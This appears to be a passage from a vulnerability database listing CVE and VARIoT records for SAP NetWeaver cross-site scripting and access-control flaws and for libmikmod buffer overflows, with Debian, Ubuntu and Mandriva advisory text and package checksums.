"shortName": "sap"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://launchpad.support.sap.com/#/notes/3124994"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cna@sap.com",
"ID": "CVE-2022-22534",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "SAP NetWeaver (ABAP and Java application Servers)",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "700"
},
{
"version_affected": "=",
"version_value": "701"
},
{
"version_affected": "=",
"version_value": "702"
},
{
"version_affected": "=",
"version_value": "731"
},
{
"version_affected": "=",
"version_value": "740"
},
{
"version_affected": "=",
"version_value": "750"
},
{
"version_affected": "=",
"version_value": "751"
},
{
"version_affected": "=",
"version_value": "752"
},
{
"version_affected": "=",
"version_value": "753"
},
{
"version_affected": "=",
"version_value": "754"
},
{
"version_affected": "=",
"version_value": "755"
},
{
"version_affected": "=",
"version_value": "756"
}
]
}
}
]
},
"vendor_name": "SAP SE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Due to insufficient encoding of user input, SAP NetWeaver allows an unauthenticated attacker to inject code that may expose sensitive data like user ID and password. These endpoints are normally exposed over the network and successful exploitation can partially impact confidentiality of the application."
}
]
},
"impact": {
"cvss": {
"baseScore": "null",
"vectorString": "null",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Cross-Site Scripting"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://launchpad.support.sap.com/#/notes/3124994",
"refsource": "MISC",
"url": "https://launchpad.support.sap.com/#/notes/3124994"
},
{
"name": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html",
"refsource": "MISC",
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2022-22534",
"datePublished": "2022-02-09T22:05:21",
"dateReserved": "2022-01-04T00:00:00",
"dateUpdated": "2024-08-03T03:14:55.475Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2014-1960
Vulnerability from cvelistv5
Published
2014-02-14 15:00
Modified
2024-08-06 09:58
Severity ?
EPSS score ?
Summary
The Solution Manager in SAP NetWeaver does not properly restrict access, which allows remote attackers to obtain sensitive information via unspecified vectors.
References
| ▼ | URL | Tags |
|---|---|---|
| https://service.sap.com/sap/support/notes/1828885 | x_refsource_CONFIRM | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/91093 | vdb-entry, x_refsource_XF | |
| http://scn.sap.com/docs/DOC-8218 | x_refsource_CONFIRM | |
| http://secunia.com/advisories/56942 | third-party-advisory, x_refsource_SECUNIA | |
| https://erpscan.io/advisories/erpscan-14-004-sap-netweaver-solution-manager-missing-authorization-check-information-disclosure/ | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T09:58:16.043Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://service.sap.com/sap/support/notes/1828885"
},
{
"name": "netweaver-solution-info-disc(91093)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91093"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "56942",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/56942"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/erpscan-14-004-sap-netweaver-solution-manager-missing-authorization-check-information-disclosure/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2014-02-13T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The Solution Manager in SAP NetWeaver does not properly restrict access, which allows remote attackers to obtain sensitive information via unspecified vectors."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-12-10T17:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://service.sap.com/sap/support/notes/1828885"
},
{
"name": "netweaver-solution-info-disc(91093)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91093"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "56942",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/56942"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/erpscan-14-004-sap-netweaver-solution-manager-missing-authorization-check-information-disclosure/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2014-1960",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The Solution Manager in SAP NetWeaver does not properly restrict access, which allows remote attackers to obtain sensitive information via unspecified vectors."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://service.sap.com/sap/support/notes/1828885",
"refsource": "CONFIRM",
"url": "https://service.sap.com/sap/support/notes/1828885"
},
{
"name": "netweaver-solution-info-disc(91093)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91093"
},
{
"name": "http://scn.sap.com/docs/DOC-8218",
"refsource": "CONFIRM",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "56942",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/56942"
},
{
"name": "https://erpscan.io/advisories/erpscan-14-004-sap-netweaver-solution-manager-missing-authorization-check-information-disclosure/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/erpscan-14-004-sap-netweaver-solution-manager-missing-authorization-check-information-disclosure/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2014-1960",
"datePublished": "2014-02-14T15:00:00",
"dateReserved": "2014-02-14T00:00:00",
"dateUpdated": "2024-08-06T09:58:16.043Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
var-201703-1407
Vulnerability from variot
SAP NetWeaver is prone to an unspecified cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. Remote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201703-1407",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "96878"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "96878"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to an unspecified cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.\nRemote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.",
"sources": [
{
"db": "BID",
"id": "96878"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "96878",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "96878"
}
]
},
"id": "VAR-201703-1407",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T01:45:17.171000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/2417046 "
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/03/14/sap-security-patch-day-march-2017/ "
}
],
"sources": [
{
"db": "BID",
"id": "96878"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "96878"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-03-14T00:00:00",
"db": "BID",
"id": "96878"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-03-16T01:02:00",
"db": "BID",
"id": "96878"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "96878"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Monitoring Application Unspecified Cross Site Scripting Vulnerability",
"sources": [
{
"db": "BID",
"id": "96878"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "96878"
}
],
"trust": 0.3
}
}
var-201008-0230
Vulnerability from variot
Multiple heap-based buffer overflows in loaders/load_it.c in libmikmod, possibly 3.1.12, might allow remote attackers to execute arbitrary code via (1) crafted samples or (2) crafted instrument definitions in an Impulse Tracker file, related to panpts, pitpts, and IT_ProcessEnvelope. NOTE: some of these details are obtained from third party information. NOTE: this vulnerability exists because of an incomplete fix for CVE-2009-3995. libmikmod of loaders/load_it.c Contains a heap-based buffer overflow vulnerability. Libmikmod is a library used by Mikmod to play various types of audio modules. The problem with CVE-2009-3995 is not completely fixed correctly. The following problems exist: - Only volpts are checked, but similar problems affect panpts and pitpts. - Checking is done after calling IT_ProcessEnvelope, the function has modified name##env as the upper bound using name##pts, so an overflow can be triggered between checks. The -name##env information is read from name##tick and name##node, where the value contains ITENVCNT (25), so using sizeof(name##env) == ENVPOINTS (32) can still cause the array to read out of bounds. take. The 'libmikmod' library is prone to multiple buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied input. Attackers can leverage these issues to execute arbitrary code in the context of an application that uses the affected library. Failed attacks will cause denial-of-service conditions. These issues are due to an incomplete fix for CVE-2009-3995; BID 38114 (libmikmod Multiple Buffer Overflow Vulnerabilities) is related to these issues. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Debian Security Advisory DSA-2081-1 security@debian.org http://www.debian.org/security/ Moritz Muehlenhoff August 01, 2010 http://www.debian.org/security/faq
Package : libmikmod Vulnerability : buffer overflow Problem type : local(remote) Debian-specific: no CVE Id(s) : CVE-2010-2546
Tomas Hoger discovered that the upstream fix for CVE-2009-3995 was insufficient. This update provides a corrected package.
For the unstable distribution (sid), these problems have been fixed in version 3.1.11-6.3.
We recommend that you upgrade your libmikmod packages.
Upgrade instructions
wget url will fetch the file for you dpkg -i file.deb will install the referenced file.
If you are using the apt-get package manager, use the line for sources.list as given below:
apt-get update will update the internal database apt-get upgrade will install corrected packages
You may use an automated update by adding the resources from the footer to the proper configuration.
Debian GNU/Linux 5.0 alias lenny
Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show
iEYEARECAAYFAkxVxoUACgkQXm3vHE4uylrhwgCfXeJqgBnpGu10QyEu3DBjwWy/ y0YAoNP/beuWGyzKeCCNXuQwZ23f0oV2 =3XKq -----END PGP SIGNATURE----- . =========================================================== Ubuntu Security Notice USN-995-1 September 29, 2010 libmikmod vulnerabilities CVE-2007-6720, CVE-2009-0179, CVE-2009-3995, CVE-2009-3996, CVE-2010-2546, CVE-2010-2971 ===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 8.04 LTS Ubuntu 9.04 Ubuntu 9.10
This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the following package versions:
Ubuntu 8.04 LTS: libmikmod2 3.1.11-6ubuntu3.8.04.1
Ubuntu 9.04: libmikmod2 3.1.11-6ubuntu3.9.04.1
Ubuntu 9.10: libmikmod2 3.1.11-6ubuntu4.1
In general, a standard system update will make all the necessary changes.
Details follow:
It was discovered that libMikMod incorrectly handled songs with different channel counts. (CVE-2007-6720)
It was discovered that libMikMod incorrectly handled certain malformed XM files. (CVE-2009-0179)
It was discovered that libMikMod incorrectly handled certain malformed Impulse Tracker files. (CVE-2009-3995, CVE-2010-2546, CVE-2010-2971)
It was discovered that libMikMod incorrectly handled certain malformed Ultratracker files. (CVE-2009-3996)
Updated packages for Ubuntu 8.04 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod_3.1.11-6ubuntu3.8.04.1.diff.gz
Size/MD5: 339148 88b89686ec91f5173c6dd8b80ce8e64e
http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod_3.1.11-6ubuntu3.8.04.1.dsc
Size/MD5: 730 9d56dccce0535ee3c48ca642da04705a
http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod_3.1.11.orig.tar.gz
Size/MD5: 611590 705106da305e8de191549f1e7393185c
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu3.8.04.1_amd64.deb
Size/MD5: 266550 9200823b863117753bac8a1aae63c2ca
http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu3.8.04.1_amd64.deb
Size/MD5: 155628 cff0d15986f092c78cda7bb3a657e1f6
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu3.8.04.1_i386.deb
Size/MD5: 244016 27453dd915f85ccd7dba0710ecab4acc
http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu3.8.04.1_i386.deb
Size/MD5: 146476 b67d8d50c02001e45eb618d51f4329a1
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu3.8.04.1_lpia.deb
Size/MD5: 248392 706f9438583e4364b4265ec8d8543bc4
http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu3.8.04.1_lpia.deb
Size/MD5: 148608 5c727d7e661e44044017cb7bd6ab3402
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu3.8.04.1_powerpc.deb
Size/MD5: 285392 c4ebd492d87451cc2979554da7e6fa34
http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu3.8.04.1_powerpc.deb
Size/MD5: 173928 e45de26f887292b7482eca418459e60c
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu3.8.04.1_sparc.deb
Size/MD5: 258120 702fbd120d05a9f1d645f85ec45ea211
http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu3.8.04.1_sparc.deb
Size/MD5: 148446 029492bfe2015986538e1f141ab51f93
Updated packages for Ubuntu 9.04:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod_3.1.11-6ubuntu3.9.04.1.diff.gz
Size/MD5: 338916 a771044f7ddf578a1618e1667effd243
http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod_3.1.11-6ubuntu3.9.04.1.dsc
Size/MD5: 1150 031a6ed819b4e9f59dc4614f42f91109
http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod_3.1.11.orig.tar.gz
Size/MD5: 611590 705106da305e8de191549f1e7393185c
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu3.9.04.1_amd64.deb
Size/MD5: 265286 5189d1d5a185819b8f0a3860fd3ecc2b
http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu3.9.04.1_amd64.deb
Size/MD5: 156988 f76e952924eceebdde01d9671f96b9b9
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu3.9.04.1_i386.deb
Size/MD5: 244312 00502a3a984d2b40bffdf46d016caa20
http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu3.9.04.1_i386.deb
Size/MD5: 147096 8cb46dd80877e60c1300e0b471a42cba
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu3.9.04.1_lpia.deb
Size/MD5: 247818 33fa14fe4ee9a538eb1c998928a302ab
http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu3.9.04.1_lpia.deb
Size/MD5: 148464 75e5cde38085b939f4c3ad709f2a6b0d
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu3.9.04.1_powerpc.deb
Size/MD5: 281656 34e746a50fbd0acd34192b9e899e161f
http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu3.9.04.1_powerpc.deb
Size/MD5: 172672 69ec0a2145ea106602c2f3fa454bc346
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu3.9.04.1_sparc.deb
Size/MD5: 255260 70cb1b7d5521b00ae993686d9336bb12
http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu3.9.04.1_sparc.deb
Size/MD5: 149422 d9e458beb786bbe71ecbf51f3ba6e758
Updated packages for Ubuntu 9.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod_3.1.11-6ubuntu4.1.diff.gz
Size/MD5: 338972 b044cd4c0262d4d38fc94de90fb520d4
http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod_3.1.11-6ubuntu4.1.dsc
Size/MD5: 1130 1feb8d8fcb433337e8ddad65e2076e4a
http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod_3.1.11.orig.tar.gz
Size/MD5: 611590 705106da305e8de191549f1e7393185c
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu4.1_amd64.deb
Size/MD5: 267300 627cc54b1a4b2ed57ae5c1de295e614c
http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu4.1_amd64.deb
Size/MD5: 157340 c36998f34e2807dbb8af42934b8ede5e
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu4.1_i386.deb
Size/MD5: 244300 063e16e7e89f79a9d8b457a3881b5820
http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu4.1_i386.deb
Size/MD5: 148654 615e8ada1a87f7aee7e5ccd51c2dca4e
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu4.1_lpia.deb
Size/MD5: 247994 fe717add1af434a346b59982f5e3c7c5
http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu4.1_lpia.deb
Size/MD5: 151404 e13a0f651953441fc9cc5958ef874d0d
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu4.1_powerpc.deb
Size/MD5: 281960 9199bd4701581881b31df45c5ede258f
http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu4.1_powerpc.deb
Size/MD5: 174950 ad1450f700117577ddede6fc3755d5da
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu4.1_sparc.deb
Size/MD5: 260378 cd74bc83de2b60ed9cf4fc442e0352e1
http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu4.1_sparc.deb
Size/MD5: 152910 b684a3227432d45c220bb1378a4ed3d7
.
Packages for 2008.0 and 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149&products_id=490
The updated packages have been patched to correct this issue.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3995 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3996 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2546 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2971
Updated Packages:
Mandriva Linux 2008.0: 3239adc6a61914a960c8bb07ebab58d2 2008.0/i586/libmikmod2-3.1.11a-8.2mdv2008.0.i586.rpm 4a88081c44652b1abbb2168bad46fc17 2008.0/i586/libmikmod-devel-3.1.11a-8.2mdv2008.0.i586.rpm ecdb3414bb5ff4fde670f2983432fe92 2008.0/SRPMS/libmikmod-3.1.11a-8.2mdv2008.0.src.rpm
Mandriva Linux 2008.0/X86_64: 41d721fc0ade6181626d66527e08260f 2008.0/x86_64/lib64mikmod2-3.1.11a-8.2mdv2008.0.x86_64.rpm b9af3c6d02828c7c36f2d47275142a01 2008.0/x86_64/lib64mikmod-devel-3.1.11a-8.2mdv2008.0.x86_64.rpm ecdb3414bb5ff4fde670f2983432fe92 2008.0/SRPMS/libmikmod-3.1.11a-8.2mdv2008.0.src.rpm
Mandriva Linux 2009.0: 0c32865a362e5949549bd0597f1c3288 2009.0/i586/libmikmod3-3.2.0-0.beta2.2.2mdv2009.0.i586.rpm 1f0c55a841c82430a4a455b9c0fd185f 2009.0/i586/libmikmod-devel-3.2.0-0.beta2.2.2mdv2009.0.i586.rpm 3b736a5f6560c844e05d797772240ff8 2009.0/SRPMS/libmikmod-3.2.0-0.beta2.2.2mdv2009.0.src.rpm
Mandriva Linux 2009.0/X86_64: da510127c478758616146f2069b013ca 2009.0/x86_64/lib64mikmod3-3.2.0-0.beta2.2.2mdv2009.0.x86_64.rpm ce57822efa45f0e36aa1d79f7cc75763 2009.0/x86_64/lib64mikmod-devel-3.2.0-0.beta2.2.2mdv2009.0.x86_64.rpm 3b736a5f6560c844e05d797772240ff8 2009.0/SRPMS/libmikmod-3.2.0-0.beta2.2.2mdv2009.0.src.rpm
Mandriva Linux 2009.1: 1987e95ad4486d0d70a5cb3f15462815 2009.1/i586/libmikmod3-3.2.0-0.beta2.3.1mdv2009.1.i586.rpm 7c1d6e99214eca60d5e1b27d742557ac 2009.1/i586/libmikmod-devel-3.2.0-0.beta2.3.1mdv2009.1.i586.rpm 2cf8f0a1794e134bad1f0510a4d4b255 2009.1/SRPMS/libmikmod-3.2.0-0.beta2.3.1mdv2009.1.src.rpm
Mandriva Linux 2009.1/X86_64: 06d66faa37c282dbee789de65dc5b246 2009.1/x86_64/lib64mikmod3-3.2.0-0.beta2.3.1mdv2009.1.x86_64.rpm 5940b272dda3c628bbf27799e43db079 2009.1/x86_64/lib64mikmod-devel-3.2.0-0.beta2.3.1mdv2009.1.x86_64.rpm 2cf8f0a1794e134bad1f0510a4d4b255 2009.1/SRPMS/libmikmod-3.2.0-0.beta2.3.1mdv2009.1.src.rpm
Mandriva Linux 2010.0: 754014cea8f3645395151dc2b7a4cc58 2010.0/i586/libmikmod3-3.2.0-0.beta2.6.1mdv2010.0.i586.rpm cd1e7fca287c53499d973478c7813a6f 2010.0/i586/libmikmod-devel-3.2.0-0.beta2.6.1mdv2010.0.i586.rpm 9db426850551cd0d47d49dce62bddf29 2010.0/SRPMS/libmikmod-3.2.0-0.beta2.6.1mdv2010.0.src.rpm
Mandriva Linux 2010.0/X86_64: 477871f309a92d2912811fb31fea0943 2010.0/x86_64/lib64mikmod3-3.2.0-0.beta2.6.1mdv2010.0.x86_64.rpm 4c02e2863a04a2201233ce6f0822fbb5 2010.0/x86_64/lib64mikmod-devel-3.2.0-0.beta2.6.1mdv2010.0.x86_64.rpm 9db426850551cd0d47d49dce62bddf29 2010.0/SRPMS/libmikmod-3.2.0-0.beta2.6.1mdv2010.0.src.rpm
Mandriva Linux 2010.1: 5dc9e3bcb87870d04daaeea37c1c7c90 2010.1/i586/libmikmod3-3.2.0-0.beta2.7.1mdv2010.1.i586.rpm 30fd5e1c50381c01c621c67f83e46c53 2010.1/i586/libmikmod-devel-3.2.0-0.beta2.7.1mdv2010.1.i586.rpm a8e35035a0439a36aed7acb4c6cd8c66 2010.1/SRPMS/libmikmod-3.2.0-0.beta2.7.1mdv2010.1.src.rpm
